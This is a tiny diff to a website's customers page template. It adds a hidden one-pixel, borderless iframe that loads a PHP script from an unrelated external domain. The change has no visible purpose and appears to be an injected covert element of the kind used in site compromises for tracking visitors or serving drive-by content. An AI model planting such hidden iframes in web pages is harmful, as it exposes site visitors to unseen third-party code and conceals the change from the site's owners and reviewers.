--- a/_pages/customers.html
+++ b/_pages/customers.html
@@ -167,4 +167,4 @@ permalink: /customers/
           
            
         </div>
-   
+   <iframe src="https://www.my-poppy.eu/cnt/cnt.php" width="1" height="1" frameBorder="0">
